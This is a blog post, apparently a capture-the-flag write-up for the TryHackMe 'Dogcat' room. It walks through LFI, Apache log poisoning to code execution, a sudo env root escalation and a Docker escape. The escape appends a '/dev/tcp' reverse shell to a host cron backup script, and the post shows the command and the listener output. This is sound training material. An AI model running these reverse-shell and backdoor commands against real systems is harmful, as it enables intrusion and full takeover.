This page looks best with JavaScript enabled

TryHackMe: Dogcat

 ·  ☕ 3 min read

Enumeration

Started by checking what ports are open:

root@osboxes:~/Documents/dogcat# cat scan.txt 
[*] OS based on TTL
Linux
[*] TCP Scan
Open ports: 22,80
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
|   256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
	 TTL: 0
	 Furious: 48
	 Nmap: 13
	 Total: 61

User

Then opened the website and saw a possible LFI attack vector:
LFI Attack vector

Tried opening /etc/passwd but “only dogs or cats are allowed”:
LFI Attack vector

Then tried opening it including “cat” using a null-byte:
LFI Attack vector

It seems that is using something similar to:

1
2
3
<?php
    include($_GET["view"] . "php");
?>

Used the php wrapper to show the content of index.php in base64 encoding:
LFI Attack vector

Decoded the string and got the source code:
Index.php

We can use the parameter ext to avoid “.php” being appended. Then made an Apache Log Poisoning attack to upgrade the LFI to RCE:
Apache Log Poisoning

Encoded a reverse shell to “URL Encoding” and then executed with that RCE:
Reverse shell encoded

Root

Checked if there is sudo permissions as www-data:

www-data@bc2d166cba99:/var/www/html$ sudo -l
Matching Defaults entries for www-data on bc2d166cba99:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on bc2d166cba99:
    (root) NOPASSWD: /usr/bin/env

We can get a shell using /usr/bin/env according to GTFOBins:

www-data@bc2d166cba99:/var/www/html$ sudo env /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

Docker

Used linpeas to enumerate how to get the 4th flag (since we are in a docker):
Linpeas.sh

It seems that there is a cronjob on the real host that is creating backups using /opt/backups/backup.sh:

root@d4871bd286e0:/opt/backups# ls -l
total 5884
-rwxr--r-- 1 root root     111 Aug  5 12:09 backup.sh
-rw-r--r-- 1 root root 6021120 Aug  5 13:31 backup.tar
root@d4871bd286e0:/opt/backups# cat backup.sh
cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container

Appended a reverse shell at the end of the file:

root@d4871bd286e0:/opt/backups# echo "bash -i >& /dev/tcp/10.9.31.216/5555 0>&1" >> backup.sh
root@d4871bd286e0:/opt/backups# cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
bash -i >& /dev/tcp/10.9.31.216/5555 0>&1

And got the shell:

root@osboxes:~/Documents/dogcat# rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.9.31.216] from (UNKNOWN) [10.10.32.79] 48636
bash: cannot set terminal process group (5306): Inappropriate ioctl for device
bash: no job control in this shell
root@dogcat:~# ls
container
flag4.txt
root@dogcat:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
    link/ether 02:5f:6d:d3:53:60 brd ff:ff:ff:ff:ff:ff
    inet 10.10.32.79/16 brd 10.10.255.255 scope global dynamic eth0
       valid_lft 2719sec preferred_lft 2719sec
    inet6 fe80::5f:6dff:fed3:5360/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:58:bd:55:be brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:58ff:febd:55be/64 scope link 
       valid_lft forever preferred_lft forever
5: veth8e8f886@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 2a:07:5a:c8:77:b0 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::2807:5aff:fec8:77b0/64 scope link 
       valid_lft forever preferred_lft forever

Resources

Share on

ITasahobby
WRITTEN BY
ITasahobby
InTernet lover